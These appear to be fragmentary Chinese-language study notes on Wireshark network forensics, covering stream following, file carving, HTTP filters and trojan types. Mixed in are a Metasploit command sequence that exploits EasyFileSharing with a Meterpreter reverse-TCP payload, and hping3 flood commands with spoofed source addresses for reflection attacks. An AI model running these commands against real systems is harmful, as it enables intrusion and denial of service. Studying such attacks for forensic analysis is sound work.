跟踪流

tcp stream

cap--->pcap

导出对象

用data过滤

tcp.stream eq 17

另存为原始数据 bin作为扩展名

处理原始数据的编辑器

 winhex1510.zip

winhex.exe

换行符对应十六进制的0d0a

包括0d0a删除

hash1.0.4

winhex 

以上是两个常用的工具软件

推荐网站：网络取证

forensicscontest.com

如果不知道使用的应用软件，即协议

ssl tls

通讯地址，美国IP 

www.882667.com IP地址查询

解码为

decode as

keep alive

outgoing

Here's the secret recipe...

文件等必须以数据来传输

保留PK

PK-----PK

504B0304

追踪流

tcp流

http流

请求方法：

get

host

User-Agent

URI

GET请求获取由Request-URI

http.request.method == "GET"

发现登录敏感信息

http.request.method == "POST"

msf

metasploit

msf5> search EasyfileSharing

msf5> use exploit/windows/http/easyfilesharing

set payload windows/meterpreter/reserse_tcp

缓冲区大小

IDA

复制出来copy

入侵请求特征：

1、get

2、4061bit

3、结束位

Wireshark的查找功能

使用正则表达式

服务器感染木马，去连接客户端

正向木马和反向木马

冰河

灰鸽子

PE文件，可移植可执行的文件

exe,sys,ini,

metasploit

metaspoit

search EasyfileSharing

msf5>use exploit/

show options

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.223.233

set rhost 192.168.223.137

set rpost 80

exploit

trunctated 截断

构造数据包（填充）

未做输入做验证

指标---木马文件

IDA

反编译

GET

get请求

C语言越界

前面填充，后面越界

4061字节

GET请求

HTTP/1.1

wireshark有查找功能

逐个查找

缓冲区溢出攻击

服务器访问客户端----syn

服务器发起syn

PE文件，program execute

防火墙规则

黑客的端口映射技术

ntp

memcahce

反射式放大攻击

伪造源地址发小包请求，大包响应到目的地址

hping3 -q -n -a 10.0.0.1 --udp -s 53 -p 68 --flood 192.168.1.1 -d 15200 (size)

hping3

hping3 --help

hping3 -q -n --rand-sorurce -p -S --flood

attck-dest-ip 

GeoIP

MaxMind DB resolver

https://dev.maxmind.com/geoip/geoip2/geolite2/

rpcap

TAP：网络分路器

rawcap

。。

wireshark

wiki.wireshark.org/SampleCaptures

wieshark官方提供的各种数据包样本

ping -n 100 （ping几个包）-l 4200（ping包长度） 

在交换机端口配置，最大可以支持几个mac地址

来防范mac地址泛洪攻击。

wireshark 不仅仅是抓包软件  数据包捕获和分析的软件

分组交换

包头（地址），包体（数据）